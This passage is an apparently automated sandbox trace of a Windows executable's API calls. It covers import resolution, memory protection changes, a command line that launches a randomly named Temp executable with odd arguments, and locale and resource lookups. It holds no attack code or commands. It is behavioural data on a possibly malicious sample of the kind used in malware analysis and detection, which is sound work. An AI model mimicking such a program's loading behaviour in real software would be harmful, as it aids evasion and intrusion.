lpProcName="VerSetConditionMask") returned 0x77253030 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0108.374] GetProcAddress 
(hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.375] 
GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0108.375] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0108.376] GetProcAddress (hModule=0x76910000, 
lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0108.376] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.377] 
LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.377] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0108.377] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0108.378] GetProcAddress 
(hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0108.378] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0108.379] GetProcAddress (hModule=0x76910000, 
lpProcName="FindFirstFileW") returned 0x769653b2 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.379] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.379] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.379] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.379] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 
0x76a00e0c [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0108.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0108.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0108.380] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0108.380] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0108.380] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0108.380] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0108.380] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0108.381] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0108.381] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0108.381] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0108.381] GetProcAddress 
(hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0108.381] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0108.381] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0108.381] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0108.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0108.381] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0108.381] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0108.381] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0108.382] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0108.382] 
GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0108.382] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0108.382] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0108.382] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0108.382] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0108.383] SetThreadLocale (Locale=0x400) returned 1 [0108.383] GetVersion () returned 0x1db10106 [0108.383] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.383] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0108.383] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.383] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0108.383] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.383] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0108.383] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0108.383] 
GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.383] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0108.383] GetACP () returned 0x4e4 [0108.384] GetCurrentThreadId () returned 0xcb8 [0108.384] GetVersion () returned 0x1db10106 [0108.384] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x291cc8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.384] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.384] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.384] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0108.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000002, 
lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0108.385] GetUserDefaultUILanguage () returned 0x409 [0108.386] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0108.386] GetThreadUILanguage () returned 0x120409 [0108.386] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0108.386] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0108.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.386] GetUserDefaultUILanguage () returned 0x409 [0108.386] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0108.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") 
returned 0x10 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0108.387] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid 
